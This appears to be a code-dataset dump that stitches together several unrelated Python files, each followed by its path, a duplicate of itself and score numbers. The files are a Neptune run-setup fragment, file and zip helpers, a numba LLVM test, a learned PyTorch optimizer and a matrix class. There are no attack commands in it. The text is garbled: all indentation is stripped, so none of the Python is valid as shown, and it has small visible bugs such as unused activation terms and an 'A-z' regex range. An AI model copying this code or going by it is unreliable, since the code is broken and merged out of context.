notebook_id, checkpoint_id = _create_notebook_checkpoint(backend)
api_run = backend.create_run(project_obj.uuid, git_ref, custom_run_id, notebook_id, checkpoint_id)
if mode == ASYNC:
run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, ASYNC_DIRECTORY, api_run.uuid)
try:
execution_id = len(os.listdir(run_path))
except FileNotFoundError:
execution_id = 0
execution_path = "{}/exec-{}-{}".format(run_path, execution_id, datetime.now())
execution_path = execution_path.replace(" ", "_").replace(":", ".")
operation_processor = AsyncOperationProcessor(
api_run.uuid,
DiskQueue(Path(execution_path), lambda x: x.to_dict(), Operation.from_dict),
backend,
sleep_time=flush_period)
elif mode == SYNC:
operation_processor = SyncOperationProcessor(api_run.uuid, backend)
elif mode == DEBUG:
operation_processor = SyncOperationProcessor(api_run.uuid, backend)
elif mode == OFFLINE:
# Run was returned by mocked backend and has some random UUID.
run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, OFFLINE_DIRECTORY, api_run.uuid)
storage_queue = DiskQueue(Path(run_path),
lambda x: x.to_dict(),
Operation.from_dict)
operation_processor = OfflineOperationProcessor(storage_queue)
else:
raise ValueError('mode should be on of ["async", "sync", "offline", "debug"]')
stdout_path = "{}/stdout".format(monitoring_namespace)
stderr_path = "{}/stderr".format(monitoring_namespace)
background_jobs = []
if capture_stdout:
background_jobs.append(StdoutCaptureBackgroundJob(attribute_name=stdout_path))
if capture_stderr:
background_jobs.append(StderrCaptureBackgroundJob(attribute_name=stderr_path))
if capture_hardware_metrics:
background_jobs.append(HardwareMetricReportingJob(attribute_namespace=monitoring_namespace))
background_jobs.append(PingBackgroundJob())
_run = Run(api_run.uuid, backend, operation_processor, BackgroundJobList(background_jobs))
if mode != OFFLINE:
_run.sync(wait=False)
if name is not None:
_run[attr_consts.SYSTEM_NAME_ATTRIBUTE_PATH] = name
if description is not None:
_run[attr_consts.SYSTEM_DESCRIPTION_ATTRIBUTE_PATH] = description
if hostname is not None:
_run[attr_consts.SYSTEM_HOSTNAME_ATTRIBUTE_PATH] = hostname
if tags is not None:
_run[attr_consts.SYSTEM_TAGS_ATTRIBUTE_PATH].add(tags)
if capture_stdout and not _run.exists(stdout_path):
_run.define(stdout_path, StringSeries([]))
if capture_stderr and not _run.exists(stderr_path):
_run.define(stderr_path, StringSeries([]))
upload_source_code(source_files=source_files, run=_run)
_run.start()
if mode == OFFLINE:
click.echo("offline/{}".format(api_run.uuid))
elif mode != DEBUG:
click.echo("{base_url}/{workspace}/{project}/e/{run_id}".format(
base_url=backend.get_display_address(),
workspace=api_run.workspace,
project=api_run.project_name,
run_id=api_run.short_id
))
return _run
def _create_notebook_checkpoint(backend: NeptuneBackend) -> (uuid.UUID, uuid.UUID):
notebook_id = None
if os.getenv(NEPTUNE_NOTEBOOK_ID, None) is not None:
try:
notebook_id = uuid.UUID(os.environ[NEPTUNE_NOTEBOOK_ID])
except ValueError:
_logger.warning("Invalid notebook ID, must be an UUID")
notebook_path = None
if os.getenv(NEPTUNE_NOTEBOOK_PATH, None) is not None:
notebook_path = os.environ[NEPTUNE_NOTEBOOK_PATH]
checkpoint_id = None
if notebook_id is not None and notebook_path is not None:
checkpoint_id = create_checkpoint(backend=backend,
notebook_id=notebook_id,
notebook_path=notebook_path)
return notebook_id, checkpoint_id | 0.501709 | 0.068195 |
import os
import re
import zipfile
from typing import Optional
def is_zip(file_type) -> bool:
"""
Check if the given file is a ZIP
Returns:
bool: Whether it's a ZIP file or not
"""
mimes = {
'application/zip',
'application/octet-stream',
'application/x-zip-compressed',
'multipart/x-zip'
}
for v in mimes:
if v == file_type:
return True
return False
def unzip(path, file_name) -> None:
"""
Unzip a ZIP file
Returns:
None: Nothing
"""
if not os.path.isfile(path + '/' + file_name):
raise Exception(
'A problem occurred while trying to unzip the file archive : file do not exists nor is a valid one.')
f = zipfile.ZipFile(path + '/' + file_name, 'r')
f.extractall(path)
f.close()
def check_times(to_update, reference) -> bool:
"""
Check if there is a difference between update times
Returns:
bool: Whether or not the first
"""
return to_update.get_last_update() >= reference.get_last_update()
def create_directory(directory_name) -> None:
"""
Create a directory called "directory_name"
Returns:
None: Nothing
"""
if not os.path.exists(directory_name):
os.makedirs(directory_name)
def create_empty_file(file_name, relative_directory) -> None:
"""
Creates an empty file in the relative directory "relative_directory"
Returns:
None: Nothing
"""
open(relative_directory + '/' + file_name, 'w').close()
# TOOK & ADAPTED FROM THIS POST :
# https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder-in-python
def clear_directory(folder) -> None:
"""
Clear a particular directory of his files
Returns:
None: Nothing
"""
for file in os.listdir(folder):
path = os.path.join(folder, file)
try:
_, ext = os.path.splitext(path)
if os.path.isfile(path) and ext != '.json':
os.unlink(path)
except Exception as e:
print(e)
def launch_exception(message: str) -> None:
"""
Launch an exception with a message "message"
Args:
message: Exception message
Returns:
None: Nothing
"""
raise Exception(message)
def parse_host(link: str) -> Optional[str]:
"""
Parse the host name in a given link
Args:
link: Link to a website
Returns:
str: the host name
"""
pattern = re.compile("^http[s]?://([a-z0-9]*\.[a-z]*)[/]?[a-zA-z0-9]*?$")
matches = pattern.match(link)
if matches:
return matches.group(1) # it's the only possible group
else:
return None
def replace(string: str, args: dict) -> str:
"""
Replaces the args in brackets by theirs value defined in args
Args:
string: string containing all the params
args: Arguments to replace
Returns:
str: the new params string with {var} replaces by var
"""
for k in args:
string = re.sub('{' + k + '}', args[k], string)
return string | gsynch/helper.py | import os
import re
import zipfile
from typing import Optional
def is_zip(file_type) -> bool:
"""
Check if the given file is a ZIP
Returns:
bool: Whether it's a ZIP file or not
"""
mimes = {
'application/zip',
'application/octet-stream',
'application/x-zip-compressed',
'multipart/x-zip'
}
for v in mimes:
if v == file_type:
return True
return False
def unzip(path, file_name) -> None:
"""
Unzip a ZIP file
Returns:
None: Nothing
"""
if not os.path.isfile(path + '/' + file_name):
raise Exception(
'A problem occurred while trying to unzip the file archive : file do not exists nor is a valid one.')
f = zipfile.ZipFile(path + '/' + file_name, 'r')
f.extractall(path)
f.close()
def check_times(to_update, reference) -> bool:
"""
Check if there is a difference between update times
Returns:
bool: Whether or not the first
"""
return to_update.get_last_update() >= reference.get_last_update()
def create_directory(directory_name) -> None:
"""
Create a directory called "directory_name"
Returns:
None: Nothing
"""
if not os.path.exists(directory_name):
os.makedirs(directory_name)
def create_empty_file(file_name, relative_directory) -> None:
"""
Creates an empty file in the relative directory "relative_directory"
Returns:
None: Nothing
"""
open(relative_directory + '/' + file_name, 'w').close()
# TOOK & ADAPTED FROM THIS POST :
# https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder-in-python
def clear_directory(folder) -> None:
"""
Clear a particular directory of his files
Returns:
None: Nothing
"""
for file in os.listdir(folder):
path = os.path.join(folder, file)
try:
_, ext = os.path.splitext(path)
if os.path.isfile(path) and ext != '.json':
os.unlink(path)
except Exception as e:
print(e)
def launch_exception(message: str) -> None:
"""
Launch an exception with a message "message"
Args:
message: Exception message
Returns:
None: Nothing
"""
raise Exception(message)
def parse_host(link: str) -> Optional[str]:
"""
Parse the host name in a given link
Args:
link: Link to a website
Returns:
str: the host name
"""
pattern = re.compile("^http[s]?://([a-z0-9]*\.[a-z]*)[/]?[a-zA-z0-9]*?$")
matches = pattern.match(link)
if matches:
return matches.group(1) # it's the only possible group
else:
return None
def replace(string: str, args: dict) -> str:
"""
Replaces the args in brackets by theirs value defined in args
Args:
string: string containing all the params
args: Arguments to replace
Returns:
str: the new params string with {var} replaces by var
"""
for k in args:
string = re.sub('{' + k + '}', args[k], string)
return string | 0.743913 | 0.276188 |
# ______________________________________________________________________
import ctypes
import llvm.core as lc
import llvm.ee as le
from numba.llvm_types import _int32, _numpy_array, _head_len
import numba.multiarray_api as ma
import numpy as np
import unittest
# ______________________________________________________________________
_pyobj_to_pyobj = ctypes.CFUNCTYPE(ctypes.py_object, ctypes.py_object)
# ______________________________________________________________________
class TestMultiarrayAPI(unittest.TestCase):
def test_call_PyArray_Zeros(self):
ma_obj = ma.MultiarrayAPI()
module = lc.Module.new('test_module')
ma_obj.set_PyArray_API(module)
test_fn = module.add_function(lc.Type.function(_numpy_array,
[_numpy_array]),
'test_fn')
bb = test_fn.append_basic_block('entry')
builder = lc.Builder.new(bb)
pyarray_zeros = ma_obj.load_PyArray_Zeros(module, builder)
arg = test_fn.args[0]
largs = [
builder.load(
builder.gep(arg,
[lc.Constant.int(_int32, 0),
lc.Constant.int(_int32, _head_len + ofs)]))
for ofs in (1, 2, 5)]
largs.append(lc.Constant.int(_int32, 0))
builder.ret(builder.call(pyarray_zeros, largs))
if __debug__:
print module
ee = le.ExecutionEngine.new(module)
test_fn_addr = ee.get_pointer_to_function(test_fn)
py_test_fn = _pyobj_to_pyobj(test_fn_addr)
test_arr = np.array([1.,2.,3.])
result = py_test_fn(test_arr)
self.assertEqual(result.shape, test_arr.shape)
self.assertTrue((result == 0.).all())
# ______________________________________________________________________
if __name__ == "__main__":
unittest.main()
# ______________________________________________________________________
# End of test_multiarray_api.py | tests/test_multiarray_api.py | # ______________________________________________________________________
import ctypes
import llvm.core as lc
import llvm.ee as le
from numba.llvm_types import _int32, _numpy_array, _head_len
import numba.multiarray_api as ma
import numpy as np
import unittest
# ______________________________________________________________________
_pyobj_to_pyobj = ctypes.CFUNCTYPE(ctypes.py_object, ctypes.py_object)
# ______________________________________________________________________
class TestMultiarrayAPI(unittest.TestCase):
def test_call_PyArray_Zeros(self):
ma_obj = ma.MultiarrayAPI()
module = lc.Module.new('test_module')
ma_obj.set_PyArray_API(module)
test_fn = module.add_function(lc.Type.function(_numpy_array,
[_numpy_array]),
'test_fn')
bb = test_fn.append_basic_block('entry')
builder = lc.Builder.new(bb)
pyarray_zeros = ma_obj.load_PyArray_Zeros(module, builder)
arg = test_fn.args[0]
largs = [
builder.load(
builder.gep(arg,
[lc.Constant.int(_int32, 0),
lc.Constant.int(_int32, _head_len + ofs)]))
for ofs in (1, 2, 5)]
largs.append(lc.Constant.int(_int32, 0))
builder.ret(builder.call(pyarray_zeros, largs))
if __debug__:
print module
ee = le.ExecutionEngine.new(module)
test_fn_addr = ee.get_pointer_to_function(test_fn)
py_test_fn = _pyobj_to_pyobj(test_fn_addr)
test_arr = np.array([1.,2.,3.])
result = py_test_fn(test_arr)
self.assertEqual(result.shape, test_arr.shape)
self.assertTrue((result == 0.).all())
# ______________________________________________________________________
if __name__ == "__main__":
unittest.main()
# ______________________________________________________________________
# End of test_multiarray_api.py | 0.179315 | 0.188623 |
import torch
import torch.nn as nn
from torch.optim import Optimizer
class OptimActivation(nn.Module):
def __init__(self):
super(OptimActivation, self).__init__()
self.params = nn.Parameter(torch.zeros(5))
def forward(self, x):
params_softmax = torch.softmax(self.params, dim=-1)
x_swish = (torch.sigmoid(x) * x) * params_softmax[0]
x_sine = torch.sin(x) * params_softmax[1]
x_linear = x * params_softmax[2]
x_sigmoid = (torch.sigmoid(x) * params_softmax[3])
x_tanh = (torch.tanh(x)) * params_softmax[4]
return x_swish + x_sine + x_linear
class OptimAttn(nn.Module):
def __init__(self, size, out_size):
super(OptimAttn, self).__init__()
self.query_linear = nn.Linear(size, size, bias=False)
self.key_linear = nn.Linear(size, size, bias=False)
self.value_linear = nn.Linear(size, size, bias=False)
self.activation = OptimActivation()
self.fc_linear = nn.Linear(size, size)
self.norm = nn.LayerNorm((size,))
self.fc_linear2 = nn.Linear(size, out_size)
self.norm2 = nn.LayerNorm((out_size,))
def forward(self, x):
query = self.query_linear(x).unsqueeze(-1)
key = self.key_linear(x).unsqueeze(-1)
value = self.value_linear(x).unsqueeze(-1)
attended = torch.matmul(query, key.transpose(1,2))
attended = torch.softmax(torch.flatten(attended, start_dim=1), dim=-1).view_as(attended)
valued = torch.matmul(attended, value)
valued = valued.squeeze(-1)
fc = self.activation(valued)
fc = self.fc_linear(fc)
fc = self.norm(fc)
fc = self.fc_linear2(fc)
fc = self.norm2(fc)
return fc
class OptimNet(torch.nn.Module):
def __init__(self, params):
super(OptimNet, self).__init__()
self.params = params.size()[-1]
self.linear_h = OptimAttn(self.params*2, self.params*2)
self.linear_h2 = OptimAttn(self.params*2, self.params*2)
self.linear_c = OptimAttn(self.params*2, 1)
self.linear_a = OptimAttn(self.params*2, self.params)
self.optimizer = torch.optim.AdamW(self.parameters(), lr=1e-3)
self.hidden = torch.zeros((1,self.params*2))
def forward(self, p_grad, is_forget=True):
z = self.hidden
h = self.linear_h(p_grad)
h = self.linear_h2(h + z)
c = self.linear_c(h)
a = self.linear_a(h)
if is_forget:
a = torch.sigmoid(a)
return a, c, h
def optimize(self, loss, p_grad, is_forget=True):
self.optimizer.zero_grad()
p_grad = p_grad.detach()
a, c, h = self.forward(p_grad, is_forget)
self.hidden = h.detach()
loss_new = (c) + torch.nn.functional.smooth_l1_loss(c, loss)
loss_new.backward(retain_graph=True)
loss_new = loss_new + loss
self.optimizer.step()
class EMLYN(Optimizer):
def __init__(self, params, lr=1e-2, betas=0.99):
defaults = dict(lr=lr, betas=betas)
super(EMLYN, self).__init__(params, defaults)
def step(self, loss):
for group in self.param_groups:
for p in group['params']:
grad_original_shape = p.grad.data.shape
grad = p.grad.data.flatten().unsqueeze(0)
parameters = p.data.flatten().unsqueeze(0)
p_g = torch.cat([grad, parameters], dim=-1)
state = self.state[p]
if len(state) == 0:
state['forgnet'] = OptimNet(params=parameters)
state['net'] = OptimNet(params=parameters)
state['neta'] = OptimNet(params=parameters)
state['momentum_buffer'] = torch.zeros_like(parameters)
net = state['net']
forgnet = state['forgnet']
neta = state['neta']
momentum_buffer = state['momentum_buffer']
with torch.enable_grad():
new_grad = net(p_g, False)[0]
new_forget = forgnet(p_g)[0]
new_neta = neta(p_g)[0]
net.optimize(loss, p_g)
forgnet.optimize(loss, p_g)
neta.optimize(loss, p_g)
grad = new_grad + grad
momentum_buffer = new_neta * momentum_buffer + (1-new_neta) * grad
grad = momentum_buffer
grad *= new_forget
grad *= group['lr']
grad = grad.view(grad_original_shape)
p.data = p.data - grad | optim.py | import torch
import torch.nn as nn
from torch.optim import Optimizer
class OptimActivation(nn.Module):
def __init__(self):
super(OptimActivation, self).__init__()
self.params = nn.Parameter(torch.zeros(5))
def forward(self, x):
params_softmax = torch.softmax(self.params, dim=-1)
x_swish = (torch.sigmoid(x) * x) * params_softmax[0]
x_sine = torch.sin(x) * params_softmax[1]
x_linear = x * params_softmax[2]
x_sigmoid = (torch.sigmoid(x) * params_softmax[3])
x_tanh = (torch.tanh(x)) * params_softmax[4]
return x_swish + x_sine + x_linear
class OptimAttn(nn.Module):
def __init__(self, size, out_size):
super(OptimAttn, self).__init__()
self.query_linear = nn.Linear(size, size, bias=False)
self.key_linear = nn.Linear(size, size, bias=False)
self.value_linear = nn.Linear(size, size, bias=False)
self.activation = OptimActivation()
self.fc_linear = nn.Linear(size, size)
self.norm = nn.LayerNorm((size,))
self.fc_linear2 = nn.Linear(size, out_size)
self.norm2 = nn.LayerNorm((out_size,))
def forward(self, x):
query = self.query_linear(x).unsqueeze(-1)
key = self.key_linear(x).unsqueeze(-1)
value = self.value_linear(x).unsqueeze(-1)
attended = torch.matmul(query, key.transpose(1,2))
attended = torch.softmax(torch.flatten(attended, start_dim=1), dim=-1).view_as(attended)
valued = torch.matmul(attended, value)
valued = valued.squeeze(-1)
fc = self.activation(valued)
fc = self.fc_linear(fc)
fc = self.norm(fc)
fc = self.fc_linear2(fc)
fc = self.norm2(fc)
return fc
class OptimNet(torch.nn.Module):
def __init__(self, params):
super(OptimNet, self).__init__()
self.params = params.size()[-1]
self.linear_h = OptimAttn(self.params*2, self.params*2)
self.linear_h2 = OptimAttn(self.params*2, self.params*2)
self.linear_c = OptimAttn(self.params*2, 1)
self.linear_a = OptimAttn(self.params*2, self.params)
self.optimizer = torch.optim.AdamW(self.parameters(), lr=1e-3)
self.hidden = torch.zeros((1,self.params*2))
def forward(self, p_grad, is_forget=True):
z = self.hidden
h = self.linear_h(p_grad)
h = self.linear_h2(h + z)
c = self.linear_c(h)
a = self.linear_a(h)
if is_forget:
a = torch.sigmoid(a)
return a, c, h
def optimize(self, loss, p_grad, is_forget=True):
self.optimizer.zero_grad()
p_grad = p_grad.detach()
a, c, h = self.forward(p_grad, is_forget)
self.hidden = h.detach()
loss_new = (c) + torch.nn.functional.smooth_l1_loss(c, loss)
loss_new.backward(retain_graph=True)
loss_new = loss_new + loss
self.optimizer.step()
class EMLYN(Optimizer):
def __init__(self, params, lr=1e-2, betas=0.99):
defaults = dict(lr=lr, betas=betas)
super(EMLYN, self).__init__(params, defaults)
def step(self, loss):
for group in self.param_groups:
for p in group['params']:
grad_original_shape = p.grad.data.shape
grad = p.grad.data.flatten().unsqueeze(0)
parameters = p.data.flatten().unsqueeze(0)
p_g = torch.cat([grad, parameters], dim=-1)
state = self.state[p]
if len(state) == 0:
state['forgnet'] = OptimNet(params=parameters)
state['net'] = OptimNet(params=parameters)
state['neta'] = OptimNet(params=parameters)
state['momentum_buffer'] = torch.zeros_like(parameters)
net = state['net']
forgnet = state['forgnet']
neta = state['neta']
momentum_buffer = state['momentum_buffer']
with torch.enable_grad():
new_grad = net(p_g, False)[0]
new_forget = forgnet(p_g)[0]
new_neta = neta(p_g)[0]
net.optimize(loss, p_g)
forgnet.optimize(loss, p_g)
neta.optimize(loss, p_g)
grad = new_grad + grad
momentum_buffer = new_neta * momentum_buffer + (1-new_neta) * grad
grad = momentum_buffer
grad *= new_forget
grad *= group['lr']
grad = grad.view(grad_original_shape)
p.data = p.data - grad | 0.943165 | 0.550789 |
from typing import List, Tuple, Union
from .exceptions import NotSquareException, ValidationError
Number = Union[int, float]
class Matrix:
def __init__(self, rows: List[List[Number]]) -> None:
self.rows = rows
self._validate()
def __str__(self) -> str:
return str(self.rows)
def __round__(self, ndigits: int = None) -> "Matrix":
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = round(self.rows[i][j], ndigits)
return Matrix(temp)
def __add__(self, other: "Matrix") -> "Matrix":
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = self.rows[i][j] + other.rows[i][j]
return Matrix(temp)
def __sub__(self, other: "Matrix") -> "Matrix":
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = self.rows[i][j] - other.rows[i][j]
return Matrix(temp)
def __mul__(self, other: Union["Matrix", Number]) -> "Matrix":
if isinstance(other, (int, float)):
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = self.rows[i][j] * other
else:
temp = self._get_zero_matrix_with_size(self.num_rows, other.num_cols)
for i in range(self.num_rows):
for j in range(other.num_cols):
for k in range(self.num_cols):
temp[i][j] += self.rows[i][k] * other.rows[k][j]
return Matrix(temp)
def __eq__(self, other: "Matrix") -> bool:
return self.rows == other.rows
def __neg__(self) -> "Matrix":
return self * -1
def _validate(self) -> None:
self.num_rows = len(self.rows)
num_cols = len(self.rows[0])
if all([len(element) == num_cols for element in self.rows]):
self.num_cols = num_cols
else:
raise ValidationError("All rows must have equal number of columns")
def _get_zero_matrix_with_size(self, rows: int, cols: int) -> List[List[Number]]:
return [[0 for _ in range(cols)] for _ in range(rows)]
def _get_zero_matrix(self) -> List[List[Number]]:
return self._get_zero_matrix_with_size(self.num_rows, self.num_cols)
def _get_diagonal_and_non_diagonal_entries(
self,
) -> Tuple[List[Number], List[Number]]:
if not self.is_square_matrix():
raise NotSquareException(
"Cannot check for diagonal matrix because it is not a square matrix"
)
diagonal = []
non_diagonal = []
[
diagonal.append(self.rows[i][j])
if i == j
else non_diagonal.append(self.rows[i][j])
for i in range(self.num_rows)
for j in range(self.num_cols)
]
return diagonal, non_diagonal
def prettify(self) -> None:
print("\n".join([str(row) for row in self.rows]))
def transpose(self) -> "Matrix":
temp = self._get_zero_matrix_with_size(self.num_cols, self.num_rows)
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[j][i] = self.rows[i][j]
return Matrix(temp)
def is_row_matrix(self) -> bool:
return self.num_rows == 1
def is_column_matrix(self) -> bool:
return self.num_cols == 1
def is_rectangular_matrix(self) -> bool:
return self.num_rows != self.num_cols
def is_square_matrix(self) -> bool:
return self.num_rows == self.num_cols
def is_zero_matrix(self) -> bool:
return self._get_zero_matrix() == self.rows
def is_symmetric_matrix(self) -> bool:
return self == self.transpose()
def is_skew_symmetric_matrix(self) -> bool:
return -self == self.transpose()
def is_diagonal_matrix(self) -> bool:
diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
return all(element == 0 for element in non_diagonal) and any(diagonal)
def is_scalar_matrix(self) -> bool:
diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
return all(element == 0 for element in non_diagonal) and all(
element != 0 and element == diagonal[0] for element in diagonal
)
def is_identity_matrix(self) -> bool:
diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
return all(element == 0 for element in non_diagonal) and all(
element == 1 for element in diagonal
) | matops/matrix.py | from typing import List, Tuple, Union
from .exceptions import NotSquareException, ValidationError
Number = Union[int, float]
class Matrix:
def __init__(self, rows: List[List[Number]]) -> None:
self.rows = rows
self._validate()
def __str__(self) -> str:
return str(self.rows)
def __round__(self, ndigits: int = None) -> "Matrix":
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = round(self.rows[i][j], ndigits)
return Matrix(temp)
def __add__(self, other: "Matrix") -> "Matrix":
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = self.rows[i][j] + other.rows[i][j]
return Matrix(temp)
def __sub__(self, other: "Matrix") -> "Matrix":
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = self.rows[i][j] - other.rows[i][j]
return Matrix(temp)
def __mul__(self, other: Union["Matrix", Number]) -> "Matrix":
if isinstance(other, (int, float)):
temp = self._get_zero_matrix()
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[i][j] = self.rows[i][j] * other
else:
temp = self._get_zero_matrix_with_size(self.num_rows, other.num_cols)
for i in range(self.num_rows):
for j in range(other.num_cols):
for k in range(self.num_cols):
temp[i][j] += self.rows[i][k] * other.rows[k][j]
return Matrix(temp)
def __eq__(self, other: "Matrix") -> bool:
return self.rows == other.rows
def __neg__(self) -> "Matrix":
return self * -1
def _validate(self) -> None:
self.num_rows = len(self.rows)
num_cols = len(self.rows[0])
if all([len(element) == num_cols for element in self.rows]):
self.num_cols = num_cols
else:
raise ValidationError("All rows must have equal number of columns")
def _get_zero_matrix_with_size(self, rows: int, cols: int) -> List[List[Number]]:
return [[0 for _ in range(cols)] for _ in range(rows)]
def _get_zero_matrix(self) -> List[List[Number]]:
return self._get_zero_matrix_with_size(self.num_rows, self.num_cols)
def _get_diagonal_and_non_diagonal_entries(
self,
) -> Tuple[List[Number], List[Number]]:
if not self.is_square_matrix():
raise NotSquareException(
"Cannot check for diagonal matrix because it is not a square matrix"
)
diagonal = []
non_diagonal = []
[
diagonal.append(self.rows[i][j])
if i == j
else non_diagonal.append(self.rows[i][j])
for i in range(self.num_rows)
for j in range(self.num_cols)
]
return diagonal, non_diagonal
def prettify(self) -> None:
print("\n".join([str(row) for row in self.rows]))
def transpose(self) -> "Matrix":
temp = self._get_zero_matrix_with_size(self.num_cols, self.num_rows)
for i in range(self.num_rows):
for j in range(self.num_cols):
temp[j][i] = self.rows[i][j]
return Matrix(temp)
def is_row_matrix(self) -> bool:
return self.num_rows == 1
def is_column_matrix(self) -> bool:
return self.num_cols == 1
def is_rectangular_matrix(self) -> bool:
return self.num_rows != self.num_cols
def is_square_matrix(self) -> bool:
return self.num_rows == self.num_cols
def is_zero_matrix(self) -> bool:
return self._get_zero_matrix() == self.rows
def is_symmetric_matrix(self) -> bool:
return self == self.transpose()
def is_skew_symmetric_matrix(self) -> bool:
return -self == self.transpose()
def is_diagonal_matrix(self) -> bool:
diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
return all(element == 0 for element in non_diagonal) and any(diagonal)
def is_scalar_matrix(self) -> bool:
diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
return all(element == 0 for element in non_diagonal) and all(
element != 0 and element == diagonal[0] for element in diagonal
)
def is_identity_matrix(self) -> bool:
diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
return all(element == 0 for element in non_diagonal) and all(
element == 1 for element in diagonal
) | 0.853394 | 0.447219 |